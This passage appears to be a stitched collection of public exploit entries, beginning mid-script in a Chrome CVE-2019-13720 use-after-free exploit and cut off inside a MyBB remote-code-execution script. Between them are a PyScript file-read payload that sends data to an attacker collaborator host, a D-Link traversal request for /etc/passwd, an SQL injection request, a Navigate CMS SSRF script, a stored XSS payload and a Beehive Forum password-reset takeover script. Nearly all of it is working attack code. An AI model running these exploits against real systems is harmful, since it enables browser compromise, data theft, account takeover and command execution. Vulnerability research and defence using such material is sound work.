SuperPageMetadataBase) { for(var SpanIndex = 0; SpanIndex < 128; SpanIndex++) { SlotSpanMetaAddress = BigInt(SuperPageMetadataBase) + BigInt((SpanIndex * 0x20) + 0x20 + 0x10); // Always an extra 0x20 to account for start of SuperPage struct HelperBigInt[0] = SlotSpanMetaAddress; DebugLog("... targetting slot span metadata at " + HelperDword[1].toString(16) + HelperDword[0].toString(16) + " for slot span " + SpanIndex.toString(10)); BucketAddress = LeakQword(FreeListHead, SlotSpanMetaAddress); HelperBigInt[0] = BucketAddress; DebugLog("... leaked bucket address of " + HelperDword[1].toString(16) + HelperDword[0].toString(16) + " for slot span " + SpanIndex.toString(10)); if(BucketAddress != BigInt(0)) { BucketAddress = BucketAddress + BigInt(0x18); // PartitionBucket.slot_size BucketSize = LeakQword(FreeListHead, BucketAddress); HelperBigInt[0] = BucketSize; DebugLog("... leaked bucket size is " + HelperDword[1].toString(16) + " " + HelperDword[0].toString(16) + " for slot span " + SpanIndex.toString(10)); if(HelperDword[0] == SlotSize) { DebugLog("... found desired slot size! Reading freelist head for SlotSpan..."); SlotSpanFreeListAddress = BigInt(SuperPageMetadataBase) + BigInt((SpanIndex * 0x20) + 0x20); // Always an extra 0x20 to account for start of SuperPage struct HelperBigInt[0] = LeakQword(FreeListHead, SlotSpanFreeListAddress); DebugLog("... leaked slot span freelist address of " + HelperDword[1].toString(16) + HelperDword[0].toString(16) + " for slot span " + SpanIndex.toString(10)); return HelperBigInt[0]; } } } } function ExecutePayload(FreeListHead) { var WasmExport = CreateWasmJITExport(); let FileReaderObj = new FileReader; let FileReaderLoaderSize = 0x140; // Literal size is 0x128, 0x140 is the bucket size post-alignment DebugLog("... WASM module and FileReader created."); FileReaderObj.onerror = WasmExport; let FileReaderLoaderPtr = HuntSlotSpanHead(FreeListHead, FileReaderLoaderSize, FeedforwardSuperPageMetadata); if (!FileReaderLoaderPtr) { DebugLog("... failed to obtain free list head for bucket size 0x140 slot span"); return; } HelperBigInt[0] = FileReaderLoaderPtr; DebugLog("... estimated a FileReaderLoader alloc address of " + HelperDword[1].toString(16) + HelperDword[0].toString(16)); FileReaderObj.readAsArrayBuffer(new Blob([])); // It is not the blob causing the allocation: FileReaderLoader itself as a class is allocated into the FastMalloc Extent let ValidationPtr = HuntSlotSpanHead(FreeListHead, FileReaderLoaderSize, FeedforwardSuperPageMetadata); if(ValidationPtr != FileReaderLoaderPtr) { HelperBigInt[0] = ValidationPtr; DebugLog("... successfully validated re-claim of FileReaderLoader slot (free list head for slot span has been re-claimed) at " + HelperDword[1].toString(16) + HelperDword[0].toString(16)); let FileReaderPtr = LeakQword(FreeListHead, FileReaderLoaderPtr + BigInt(0x10)) - BigInt(0x68); let VectorPtr = LeakQword(FreeListHead, FileReaderPtr + BigInt(0x28)); let RegisteredEventListenerPtr = LeakQword(FreeListHead, VectorPtr); let EventListenerPtr = LeakQword(FreeListHead, RegisteredEventListenerPtr); let EventHandlerPtr = LeakQword(FreeListHead, EventListenerPtr + BigInt(0x8)); let JsFuncObjPtr = LeakQword(FreeListHead, EventHandlerPtr + BigInt(0x8)); let JsFuncPtr = LeakQword(FreeListHead, JsFuncObjPtr) - BigInt(1); let SharedFuncInfoPtr = LeakQword(FreeListHead, JsFuncPtr + BigInt(0x18)) - BigInt(1); let WasmExportedFunctDataPtr = LeakQword(FreeListHead, SharedFuncInfoPtr + BigInt(0x8)) - BigInt(1); let WasmInstancePtr = LeakQword(FreeListHead, WasmExportedFunctDataPtr + BigInt(0x10)) - BigInt(1); let StubAddrFieldOffset = undefined; switch (MajorVersion) { case 77: StubAddrFieldOffset = BigInt(0x8) * BigInt(16); break; case 76: StubAddrFieldOffset = BigInt(0x8) * BigInt(17); break } let RwxJitStubPtr = LeakQword(FreeListHead, WasmInstancePtr + StubAddrFieldOffset); HelperBigInt[0] = RwxJitStubPtr; DebugLog("... resolved JIT stub address of " + HelperDword[1].toString(16) + HelperDword[0].toString(16)); for(var x = 0; x < Egghunter.length; x += 8) { JitChunkAddress = RwxJitStubPtr + BigInt(x); HelperBigInt[0] = JitChunkAddress; //DebugLog("... writing chunk of egghunter shellcode at offset " + x.toString(10) + " to JIT region at " + HelperDword[1].toString(16) + HelperDword[0].toString(16)); for(var y = 0; y < 8; y++) { HelperUint8[y] = Egghunter[x + y]; } WriteQword(FreeListHead, JitChunkAddress, HelperBigInt[0]); } HelperBigInt[0] = RwxJitStubPtr; DebugLog("... executing shellcode at " + HelperDword[1].toString(16) + HelperDword[0].toString(16)); WasmExport(); } else { DebugLog("... failed to validate re-claim of FileReaderLoader slot at " + HelperDword[1].toString(16) + HelperDword[0].toString(16)); } } async function PrePayloadHeapGroom() { DebugLog("... grooming heap in preparation for R/W primitive creation and payload execution..."); await GC(); DoubleAllocAudioBufs = []; // These were the "holders" making sure Chrome itself didn't re-claim feedforward up until this point. Now free and immediately re-claim them, once again as audio buffers. for (var j = 0; j < 80; j++) { MutableFreeListAudioBufs.push(SharedAudioCtx.createBuffer(1, 2, 10000)); } // At this stage, feedforward is double allocated. Once as a feedforward or IIRFilters, and once as an audio buffer. Here we are putting it into double use, wherein as a feedforward it will now be (truly) free (and in the freelist), while in the other it is a committed/allocated audio buffer we can R/W. IIRFilters = new Array(1); await GC(); for (var j = 0; j < 336; j++) { ImageDataArray.push(new ImageData(1, 2)); } ImageDataArray = new Array(10); await GC(); for (var j = 0; j < MutableFreeListAudioBufs.length; j++) { let MutableFreeListEntry = new BigUint64Array(MutableFreeListAudioBufs[j].getChannelData(0).buffer); if (MutableFreeListEntry[0] != BigInt(0)) { let FreeListHeadPtr = GetPartitionPageMetadata(ReverseBigInt(MutableFreeListEntry[0])); // Extract the Super Page base/metadata entry for the leaked flink from feedforward: this will be in an ArrayMalloc Extent as opposed to the FastMalloc Extent. let AllocCount = 0; MutableFreeListEntry[0] = ReverseBigInt(FreeListHeadPtr); // Spray new 8 byte allocations until our (controlled) poisoned free list flink entry is allocated do { GcPreventer.push(new ArrayBuffer(8)); if (++AllocCount > 0x100000) { DebugLog("... failed to re-claim final free list flink with alloc spray"); return; // If we sprayed this number of allocations without our poisoned flink being consumed, assume the re-claim failed } } while (MutableFreeListEntry[0] != BigInt(0)); // The last allocation consumed our mutable free list flink entry (which we had poisoned the flink of to point at the free list head metadata on the Super Page head). let FreeListHead = new BigUint64Array(new ArrayBuffer(8)); // Alloc the free list head itself. We can now control where new allocs are made without needing to do sprays. GcPreventer.push(FreeListHead); ExecutePayload(FreeListHead); return; } } return; } async function DoubleAllocUAF(FeedforwardAddress, CallbackFunc) { let NumberOfChannels = 1; let TempAudioCtx = new OfflineAudioContext(NumberOfChannels, 48000 * 100, 48000); let AudioBufferSourceNode = TempAudioCtx.createBufferSource(); let ConvolverNode = TempAudioCtx.createConvolver(); let Finished = false; // Create and initialize two shared audio buffers: one for the buffer source, the other for the convolver (UAF) let BigSourceBuf = TempAudioCtx.createBuffer(NumberOfChannels, 0x100, 48000); let SmallUafBuf = TempAudioCtx.createBuffer(NumberOfChannels, 0x2, 48000); SmallUafBuf.getChannelData(0).fill(0); for (var i = 0; i < NumberOfChannels; i++) { var ChannelData = new BigUint64Array(BigSourceBuf.getChannelData(i).buffer); ChannelData[0] = FeedforwardAddress; } AudioBufferSourceNode.buffer = BigSourceBuf; ConvolverNode.buffer = SmallUafBuf; // Setup the audio processing graph and begin rendering AudioBufferSourceNode.loop = true; AudioBufferSourceNode.loopStart = 0; AudioBufferSourceNode.loopEnd = 1; AudioBufferSourceNode.connect(ConvolverNode); ConvolverNode.connect(TempAudioCtx.destination); AudioBufferSourceNode.start(); TempAudioCtx.startRendering().then(function(Buf) { Buf = null; if (Finished) { TempAudioCtx = null; setTimeout(CallbackFunc, 200); return; } else { Finished = true; setTimeout(function() { DoubleAllocUAF(FeedforwardAddress, CallbackFunc); }, 1); } }); while (!Finished) { ConvolverNode.buffer = null; await Sleep(1); // Give a small bit of time for the renderer to write the feedforward address into the freed buffer if (Finished) { break; } for (let i = 0; i < IIRFilters.length; i++) { OutputFloatArray.fill(0); // Initialize the array to all 0's the Nyquist filter created by getFrequencyResponse will see it populated by PI. IIRFilters[i].getFrequencyResponse(OutputFloatArray, OutputFloatArray, OutputFloatArray); if (OutputFloatArray[0] != 3.1415927410125732) { Finished = true; DoubleAllocAudioBufs.push(TempAudioCtx.createBuffer(1, 1, 10000)); // These 2 allocs are accessing the fake flink in the feedforward array and re-claiming/"holding" it until the final UAF callback is called. We do not want Chrome to accidentally re-claim feedforward on its own. DoubleAllocAudioBufs.push(TempAudioCtx.createBuffer(1, 1, 10000)); AudioBufferSourceNode.disconnect(); ConvolverNode.disconnect(); return; } } ConvolverNode.buffer = SmallUafBuf; await Sleep(1); } } function InfoleakUAFCallback(LeakedFlinkPtr, RenderCount) { SharedAudioCtx = new OfflineAudioContext(1, 1, 3000); // This is a globally scoped context: its initialization location is highly sensitive to the heap layout later on (created after the infoleak UAF, but before the pre-payload heap grooming where it is used) HelperBigInt[0] = LeakedFlinkPtr; DebugLog("... leaked free list ptr from ScriptNode audio handler at iteration " + RenderCount.toString(10) + ": " + HelperDword[1].toString(16) + HelperDword[0].toString(16)); HelperBigInt[0] = GetSuperPageBase(LeakedFlinkPtr); DebugLog("... Super page: " + HelperDword[1].toString(16) + HelperDword[0].toString(16)); FeedforwardSuperPageBase = (HelperBigInt[0] - (BigInt(0x200000) * BigInt(42))); // Feedforward and the leaked ptr will share an extent, but feedforward will be in a bucket size 0x30 slot span on partition page index 27 of the first Super Page, while the location of the leaked ptr will be within a size 0x200 bucket size slot span on the second Super Page: after my heap grooming, this leaked ptr will consistently fall on Super Page 43 of 44 regardless of whether it falls in to a 0x200 or 0x240 slot span. HelperBigInt[0] = FeedforwardSuperPageBase; DebugLog("... first Super Page in extent: " + HelperDword[1].toString(16) + HelperDword[0].toString(16)); HelperBigInt[0] = GetSuperPageMetadata(FeedforwardSuperPageBase); FeedforwardSuperPageMetadata = HelperBigInt[0]; // This is needed for later in the exploit. IIRFilterFeedforwardAllocPtr = GetPartitionPageBase(FeedforwardSuperPageBase, BigInt(27)) + BigInt(0xFF0); // Offset 0xFF0 in to the 0x30 slot span on the first Super Page will translate to slot index 86, which will reliably contain the previously sprayed feedforward data. HelperBigInt[0] = IIRFilterFeedforwardAllocPtr; DebugLog("... IIRFilterFeedforwardAllocPtr: " + HelperDword[1].toString(16) + HelperDword[0].toString(16)); DoubleAllocUAF(ReverseBigInt(IIRFilterFeedforwardAllocPtr), PrePayloadHeapGroom); } async function InfoleakUAF(CallbackFunc) { let TempAudioCtx = new OfflineAudioContext(1, 48000 * 100, 48000); // A sample frame is a Float32: here we dictate what the total/maximum number of frames will be. Wheen rendering begins a destination buffer of size (4 * NumberOfSampleFrame) will be allocated to hold the processsed data after it travels through the ConvolverNode and ScriptNode. let AudioBufferSourceNode = TempAudioCtx.createBufferSource(); let ConvolverNode = TempAudioCtx.createConvolver(); let ScriptNode = TempAudioCtx.createScriptProcessor(0x4000, 1, 1); // 0x4000 buffer size, 1 input channel 1 output channel. let ChannelBuf = TempAudioCtx.createBuffer(1, 1, 48000); let OriginBuf = TempAudioCtx.createBuffer(1, 1, 48000); let Finished = false; let RenderCount = 0; ConvolverNode.buffer = ChannelBuf; AudioBufferSourceNode.buffer = OriginBuf; // The source of all data flowing through the audio processing graph: its contents will be repeatedly duplicated and sent through the graph until the OfflineAudioContext.destination is full AudioBufferSourceNode.loop = true; AudioBufferSourceNode.loopStart = 0; AudioBufferSourceNode.loopEnd = 1; ChannelBuf.getChannelData(0).fill(0); // This is the SharedAudioBuffer that will be shared between this thread and the renderer thread AudioBufferSourceNode.connect(ConvolverNode); ConvolverNode.connect(ScriptNode); ScriptNode.connect(TempAudioCtx.destination); AudioBufferSourceNode.start(); ScriptNode.onaudioprocess = function(Evt) { RenderCount++; for (let i = 0; i < 1; i++) { let ChannelInputBuf = new Uint32Array(Evt.inputBuffer.getChannelData(i).buffer); for (let j = 0; j < ChannelInputBuf.length; j++) { /* Notably, it is not only the first frame of the input buffer which is checked for the leaked flink. There are 16384 frames (each the size of a Float32) copied into the input channel buffer each time this handler receives an event. Typically only 0-1 of these frames will contain a leaked flink freelist pointer. */ if (j + 1 < ChannelInputBuf.length && ChannelInputBuf[j] != 0 && ChannelInputBuf[j + 1] != 0) { let TempHelperBigInt = new BigUint64Array(1); let TempHelperDword = new Uint32Array(TempHelperBigInt.buffer); TempHelperDword[0] = ChannelInputBuf[j + 0]; // Extract a QWORD from the SharedAudioBuffer TempHelperDword[1] = ChannelInputBuf[j + 1]; let LeakedFlinkPtr = ReverseBigInt(TempHelperBigInt[0]); // Check QWORD from SharedAudioBuffer for a non-zero value if (LeakedFlinkPtr >> BigInt(32) > BigInt(0x8000)) { LeakedFlinkPtr -= BigInt(0x800000000000); // Valid usermode pointer, or within kernel region? } if (LeakedFlinkPtr < BigInt(0xFFFFFFFFFFFF) && LeakedFlinkPtr > BigInt(0xFFFFFFFF)) { // Valid leak: end the recursion cycle for this UAF and execute a callback Finished = true; Evt = null; AudioBufferSourceNode.disconnect(); ScriptNode.disconnect(); ConvolverNode.disconnect(); setTimeout(function() { CallbackFunc(LeakedFlinkPtr, RenderCount); }, 1); return; } } } } }; TempAudioCtx.startRendering().then(function(Buf) { Buf = null; // Rendering is finished: always consider this the end of this iteration of attempted UAF and recursively re-execute the UAF until the ScriptNode picks up a UAF and ends the recursion cycle if (!Finished) { Finished = true; InfoleakUAF(CallbackFunc); } }); /* Attack the race condition which allows for a free list flink to be copied into the ScriptNode input channel buffer: the renderer thread is receiving data into the SharedBuffer in the Convolver, processing it, then copying it into the ScriptNode input channel until it is full (then the ScriptNode receives an event). The SharedBuffer must be freed precisely between the time when new data is received from the BufferSource, and the processed data is copied into the ScriptNode. Simply freeing the buffer will not work, since the next chunk of data from the BufferSource will not be placed into SharedBuffer if it is NULL. However, there is no check if SharedBuffer is NULL when the processed data it contains is copied into the ScriptNode input. */ while (!Finished) { ConvolverNode.buffer = null; ConvolverNode.buffer = ChannelBuf; await Sleep(1); // 1ms } } function FeedforwardHeapGroom() { let TempAudioCtx = new OfflineAudioContext(1, 48000 * 100, 48000); let FeedforwardArray = new Float64Array(2); // 0x30 allocation. Size may be adjusted: 20 = 0xa0 size. 20 is max. Does not influence contained data. let FeedbackArray = new Float64Array(1); // Has no effect on allocation size but directly influences contained data. // Spray 0x30 allocations into the FastAlloc Extent (Super Page 1/2). The debug egg can be used to locate this Extent in memory. FeedbackArray[0] = DebugEgg; // Modifying this value controls the data at offset 0x18 of the 0x30 slot. Value from 0xeeeeeeee egg: 1f 1a eb 47 92 24 f1 bd 0xbdf1249247eb1a1f FeedforwardArray[0] = 0; // Changing these feedforward values has no affect on memory at leaked ptr FeedforwardArray[1] = -1; for (let i = 0; i < (256 * 1); i++) { // The 0x30 slot span will typically fall on Partition Page 27 of the first Super Page of the FastMalloc Extent when these IIR filtrs are creatd directly after page initialization. IIRFilters.push(TempAudioCtx.createIIRFilter(FeedforwardArray, FeedbackArray)); } // Clog the free 0x240 slots in the first Super Page of the FastAlloc Extent: chrome_child!blink::BackgroundHTMLParser::Create+0x2f triggers an 0x230 during init which causess an 0x240 slot span to be created in the first Super Page. let Bucket240Slots = 62; // 63 will cause one additional 0x240 alloc in the final Super Page (44), resulting in a potential issue with delta from leaked pointer. 61 and lower will consistently crash. for(var x = 0; x < Bucket240Slots; x++) { // Size 0x240 slot spans have 64 slots in them. This count ensures the 0x240 slot span in the first Super Page will be clogged. Only 1 alloc (of size 0x230) will be present in 0x240 slot span. TempConvolver = TempAudioCtx.createConvolver(); AudioBuf = TempAudioCtx.createBuffer(1, 0x10, 48000); TempConvolver.buffer = AudioBuf; GcPreventer.push(AudioBuf); GcPreventer.push(TempConvolver); } // Allocs of 0x240 will fall into a slot span on Super Page 43. However, 0x200 will fall in to 42. Spray 32 0x200 allocs to create/clog a slot span on Super Page 42 to ensure this does not happen. let Bucket200Slots = 36; // An extra couple slot allocs in case there are open slots <= 42 which may sink hole the desired memory leak pointer from SetBuffer. Too many of these allocs may push the leaked pointer into 44 though, so this is a delicate balance. for(var x = 0; x < (Bucket200Slots / 2); x++) { TempConvolver = TempAudioCtx.createConvolver(); // Each convolver triggers 2 FastZeroedMalloc of size 0x200. So 16 are needed to clog a slot span of 32 slots (which is universally the default 0x200 size) GcPreventer.push(TempConvolver); } } try { var BrowserVersion = navigator.userAgent.split("Chrome/")[1].split(" Safari/")[0]; MajorVersion = parseInt(BrowserVersion.substr(0, 2)); if (MajorVersion <= 78) { ValidBrowser = true; if(MajorVersion != 76) { alert("This exploit has only been tested on Google Chrome 76.0.3809.132 Official Build 64-bit: for most reliable results use this version"); } } else { alert("CVE-2019-13720 was patched in Google Chrome 78.0.3904.87: invalid browser"); } } catch (e) { DebugLog("... failed to parse browser version from user agent."); } if(ValidBrowser) { FeedforwardHeapGroom(); InfoleakUAF(InfoleakUAFCallback); } else { DebugLog("... unsupported browser version " + navigator.userAgent); } </script> </html>

# Exploit Title: PyScript Remote Emscripten VMemory Python libraries Source Codes Read # Date: 5-9-2022 # Exploit Author: Momen Eldawakhly (Cyber Guy) # Vendor Homepage: https://pyscript.net/ # Software Link: https://github.com/pyscript/pyscript # Version: 2022-05-04-Alpha # Tested on: Ubuntu Apache Server # CVE : CVE-2022-30286 <py-script> x = "CyberGuy" if x == "CyberGuy": with open('/lib/python3.10/asyncio/tasks.py') as output: contents = output.read() print(contents) print('<script>console.pylog = console.log; console.logs = []; console.log = function(){ console.logs.push(Array.from(arguments)); console.pylog.apply(console, arguments);fetch("http://YOURburpcollaborator.net/", {method: "POST",headers: {"Content-Type": "text/plain;charset=utf-8"},body: JSON.stringify({"content": btoa(console.logs)})});}</script>') </py-script>

# Exploit Title: DLINK DAP-1620 A1 v1.01 - Directory Traversal # Date: 27/4/2022 # Exploit Author: Momen Eldawakhly (Cyber Guy) # Vendor Homepage: https://me.dlink.com/consumer # Version: DAP-1620 - A1 v1.01 # Tested on: Linux # CVE : CVE-2021-46381 POST /apply.cgi HTTP/1.1 Content-Type: application/x-www-form-urlencoded Referer: http://84.217.16.220/ Cookie: ID=634855649 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,br Content-Length: 281 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36 Host: 84.217.16.220 Connection: Keep-alive action=do_graph_auth&graph_code=94102&html_response_message=just_login&html_response_page=../../../../../../../../../../../../../../etc/passwd&log_pass=DummyPass&login_n=admin&login_name=DummyName&tkn=634855349&tmp_log_pass=DummyPass&tmp_log_pass_auth=DummyPass

# Exploit Title: Explore CMS 1.0 - SQL Injection # Date: 19/03/2022 # Exploit Author: Sajibe Kanti # Vendor Name : EXPLORE IT # Vendor Homepage: https://exploreit.com.bd # CVE: CVE-2022-27412 # POC # SQL Injection SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. explore CMS is vulnerable to the SQL Injection in 'id' parameter of the 'page' page. #Steps to reproduce Following URL is vulnerable to SQL Injection in the 'id' field. GET /page.php?id=1%27%20OR%201%3d1%20OR%20%27ns%27%3d%27ns HTTP/1.1 Host: REDACTED Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-us,en;q=0.5 Cache-Control: no-cache Cookie: PHPSESSID=b4c39f2ff3b9470f39bc088ab9ba9320 Referer: REDACTED User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 HTTP/1.1 200 OK content-encoding: server: LiteSpeed Connection: Keep-Alive Keep-Alive: timeout=5, max=100 content-type: text/html; charset=UTF-8 transfer-encoding: chunked date: Thu, 17 Mar 2022 07:27:21 GMT vary: Accept-Encoding 10.3.34-MariaDB Server accepts the payload and the response get delayed by 7 seconds.

#!/usr/bin/env python3 # Exploit Title: Navigate CMS 2.9.4 - Server-Side Request Forgery (SSRF) (Authenticated) # Exploit Author: cheshireca7 # Vendor Homepage: https://www.navigatecms.com/ # Software Link: https://sourceforge.net/projects/navigatecms/files/releases/navigate-2.9.4r1561.zip/download # Version: 2.9.4 and earlier # Tested on: Ubuntu 20.04 # CVE: CVE-2022-28117 # # -*- coding: utf-8 -*- import requests as r, signal from emoji import emojize from argparse import ArgumentParser from sys import exit from requests_toolbelt.multipart.encoder import MultipartEncoder from hashlib import md5 from time import sleep from base64 import b64decode,b64encode from colorama import Fore, Style #proxies = {'http':'http://127.0.0.1:8080'} def handler(signum, frame): print("["+Fore.YELLOW+"!"+Style.RESET_ALL+"] "+emojize(b64decode("T2gsIHlvdSBjYW7igJl0IGhlbHAgdGhhdCwgd2UncmUgYWxsIG1hZCBoZXJlIC4uLiA6cGF3X3ByaW50czoK").decode('UTF-8'))) exit() def login(): print("["+Fore.BLUE+"*"+Style.RESET_ALL+f"] Trying to authenticate as {args.username} ...") sleep(1) try: # Grabbing CSRF Token s = r.Session() resp = s.get(f"{args.target}/login.php")#, proxies=proxies) csrf_token = resp.headers['X-Csrf-Token'] # Performing login data = MultipartEncoder(fields={'login-username':f"{args.username}",'csrf_token':f"{csrf_token}",'login-password':f"{args.password}"}) headers = {'Content-Type':data.content_type} resp = s.post(f"{args.target}/login.php", data=data, headers=headers, allow_redirects=False)#, proxies=proxies) except: print("["+Fore.RED+"!"+Style.RESET_ALL+"] Something went wrong performing log in") exit(-1) if resp.status_code == 302: print("["+Fore.GREEN+"+"+Style.RESET_ALL+"] Login successful!") for cookie in resp.cookies: if "NVSID" in cookie.name: return (resp.headers['X-Csrf-Token'],f"{cookie.name}={cookie.value}") else: print("["+Fore.RED+"!"+Style.RESET_ALL+f"] Incorrect {args.username}'s credentials") exit(-1) def exploit(values): print("["+Fore.BLUE+"*"+Style.RESET_ALL+"] Performing SSRF ...") sleep(1) # Abusing cache feature to retrieve response data = {'limit':'5','language':'en','url':f'{args.payload}'} headers = {'X-Csrf-Token':values[0]} cookies = {values[1].split('=')[0]:values[1].split('=')[1]} resp = r.post(f"{args.target}/navigate.php?fid=dashboard&act=json&oper=feed", cookies=cookies, headers=headers, data=data)#, proxies=proxies) # Retrieving the file with response from static route md5File = md5(f"{args.payload}".encode('UTF-8')).hexdigest() resp = r.get(f"{args.target}/private/1/cache/{md5File}.feed",cookies=cookies)#,proxies=proxies) if len(resp.text) > 0: print("["+Fore.GREEN+"+"+Style.RESET_ALL+"] Dumping content ...") sleep(1) print(f"\n{resp.text}") exit(0) else: print("["+Fore.RED+"!"+Style.RESET_ALL+"] No response received") exit(-1) if __name__ == '__main__': # Define parameters signal.signal(signal.SIGINT, handler) parser = ArgumentParser(description='CVE-2022-28117: Navigate CMS <= 2.9.4 - Server-Side Request Forgery (Authenticated)') parser.add_argument('-x', '--payload',default='file:///etc/passwd', help='URL to be requested (default=file:///etc/passwd)') parser.add_argument('-u','--username', default='admin', help='Username to log in the CMS (default=admin)') parser.add_argument('-p','--password', required=True, help='Password to log in the CMS') parser.add_argument('target', help='URL where the CMS is hosted. Ex: http://example.com[:80]/navigate') args = parser.parse_args() exploit(login())

# Exploit Title: PHProjekt PhpSimplyGest v1.3.0 - Stored Cross-Site Scripting (XSS) # Date: 2022-05-05 # Exploit Author: Andrea Intilangelo # Vendor Homepage: http://www.phprojekt.altervista.org (removed demo was at http://phprojekt.altervista.org/phpsimplygest130) # Software Link: https://github.com/robyfofo/MyProjects (original PhpSimplyGest https://github.com/robyfofo/PhpSimplyGest now merged/renamed into MyProjects) # Version: 1.3 # Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 100.0, Microsoft Edge 101.0.1210.32) # CVE: CVE-2022-27308 # Description: A stored cross-site scripting (XSS) vulnerability in PHProjekt PhpSimplyGest v1.3.0 (and related products from same vendor, like "MyProjects") allows attacker to execute arbitrary web scripts or HTML. Injecting persistent javascript code inside the title description (or content) while creating a project, todo, timecard, estimates, report or finding, it will be triggered once page gets loaded. # Steps to reproduce: Click on Projects and add or edit an existing one, Insert the following PoC inside the Title <<SCRIPT>alert("XSS here");//\<</SCRIPT> Click on 'Send'. If a user visits the website dashboard, as well as project summary page, the javascript code will be rendered.

# Exploit Title: Beehive Forum - Account Takeover # Date:08/05/2022. # Exploit Author: Pablo Santiago # Vendor Homepage: https://www.beehiveforum.co.uk/ # Software Link: https://sourceforge.net/projects/beehiveforum/ # Version: 1.5.2 # Tested on: Kali Linux and Ubuntu 20.0.4 # CVE N/A # PoC: https://imgur.com/a/hVlgpCg # Vulnerability: In the functionality "forgot password", it's possible to modify the Header "Host", #injecting malicious host, allowing stealing the token and resetting the password from a victim.#(Requires user interaction) import requests from bs4 import BeautifulSoup import socket import sys import urllib.parse import random import string endpoint = sys.argv[1] lhost = sys.argv[2] lport = int(sys.argv[3]) hostheader = f'{lhost}:{lport}' url_forgot = f'http://{endpoint}/forum/forgot_pw.php' url_change = f'http://{endpoint}/forum/change_pw.php' def init_req(): session = requests.Session() r = session.get(url_forgot) cookie = session.cookies.get_dict() cookie = cookie['sess_hash'] soup = BeautifulSoup(r.text, 'lxml') hash_request = soup.input['id'] csrf_token = soup.input['value'] return hash_request, csrf_token, cookie def forgot_req(hash_request: str, csrf_token: str, cookie: str): headers= { 'Host': hostheader, 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0', 'Accept-Language': 'es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3', 'Cookie' : 'sess_hash=' + cookie } data = { hash_request : csrf_token, 'webtag' : 'TEST', 'logon' : 'admin', 'request' : 'Request' } r = requests.post(url_forgot, headers=headers, data=data) if('You should shortly receive an e-mail containing instructions for resetting your password' in r.text): print('') print('[*] A mail has been sent to the victim') socket_req() else: print('[*] The mail has not been sent') def socket_req(): print(f"[*] Listening on port {lport}...." ) print('[*] Waitting the victim clicks in the malicious link\n') s = socket.socket() s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) s.bind((lhost, lport)) s.listen() (sock_c, _) = s.accept() get_request = sock_c.recv(4096) user_token = urllib.parse.unquote_plus(get_request.split(b" HTTP")[0][-13:].decode("UTF-8")) print("[*] Stole token: " + user_token) change_pw(user_token) def change_pw(user_token: str): c = string.ascii_letters + string.digits password = ''.join(random.choice(c) for _ in range(6)) hash_request, csrf_token, cookie = init_req() headers= { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0', 'Accept-Language': 'es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3', 'Cookie' : 'sess_hash=' + cookie } data = { hash_request : csrf_token, 'webtag' : 'TEST', 'u' : '1', 'h' : user_token, 'pw' : password, 'cpw' : password, 'save' : 'Save' } r = requests.post(url_change, headers=headers, data=data) if('Your password has been changed' in r.text): print(f'[*] The password has been changed to: {password}') else: print('[*] The password has been changed') hash_request, csrf_token, cookie = init_req() forgot_req(hash_request, csrf_token, cookie)

# Exploit Title: MyBB 1.8.29 - Remote Code Execution (RCE) (Authenticated) # Date: 2022-05-08 # Exploit Author: Altelus # Vendor Homepage: https://mybb.com/ # Software Link: https://github.com/mybb/mybb/releases/tag/mybb_1829 # Version: MyBB 1.8.29 # Tested on: Linux # CVE : CVE-2022-24734 # An RCE can be obtained on MyBB's Admin CP in Configuration -> Add New Setting. # The user must have a rights to add or update setting. This is tested on MyBB 1.8.29. # The vulnerability may have existed as early as 1.4.0 since this # 'php' checking is introduced in 1.4.0 (https://github.com/mybb/mybb/security/advisories/GHSA-876v-gwgh-w57f) import requests import argparse import random import string from base64 import b64decode from bs4 import BeautifulSoup def login(username, password): data = { "username" : username, "password" : password, "do" : "login" } login_txt = r_client.post(host + "/admin/index.php", data=data).text if "The username and password combination you entered is invalid" in login_txt: print("[-] Login failure. Incorrect credentials supplied") exit(0) print("[+] Login successful!") def add_settings(cmd, raw_cmd=""): config_settings_txt = r_client.get(host + "/admin/index.php?module=config-settings&action=add").text if "Access Denied" in config_settings_txt: print("[-] Supplied user doesn't have the rights to add a setting") exit(0) print("[*] Adding a malicious settings...") soup = BeautifulSoup(config_settings_txt, "lxml") my_post_key = soup.find_all("input", {"name" : "my_post_key"})[0]['value'] rand_string = get_rand_string() if raw_cmd != "": extra = "\" . system('{}') .\"".format(raw_cmd) else: extra = "\" . system('{} | base64 -w 0') .\"".format(cmd) data = { "my_post_key" : my_post_key, "title" : "An innocent setting", "description" : "An innocent description", "gid" : 1, "disporder" : "", "name" : rand_string, "type" : "\tphp", "extra" : extra, "value" : "An innocent value" } post_setting = r_client.post(host + "/admin/index.php?module=config-settings&action=add",data=data,allow_redirects=False) if post_setting.status_code != 302: soup = BeautifulSoup(post_setting.text, "lxml") error_txt = soup.find_all("div", {"class" : "error"})[0].text print("[-] Exploit didn't work. Reason: '{}'".format(error_txt)) exit(0) print("[+] Malicious post settings accepted!") return rand_string def get_rand_string(length=20): return ''.join(random.choice(string.ascii_letters) for i in range(length)) def get_cmd_result(ident_string, raw_cmd=""): conf_settings_list = r_client.get(host + "/admin/index.php?module=config-settings&action=change").text soup = BeautifulSoup(conf_settings_list, "lxml") row_setting = soup.find_all("tr", {"id" : "row_setting_{}".format(ident_string)})[0] cmd_result = row_setting.find_all("div", {"class" : "form_row"})[0].text if raw_cmd == "": cmd_result = b64decode(cmd_result[2:]).decode() print("[+] Result: {}".format(str(cmd_result))) parser = argparse.ArgumentParser() parser.add_argument('--username', required=True, help="MyBB Admin CP username") parser.add_argument('--password', required=True, help="MyBB Admin CP 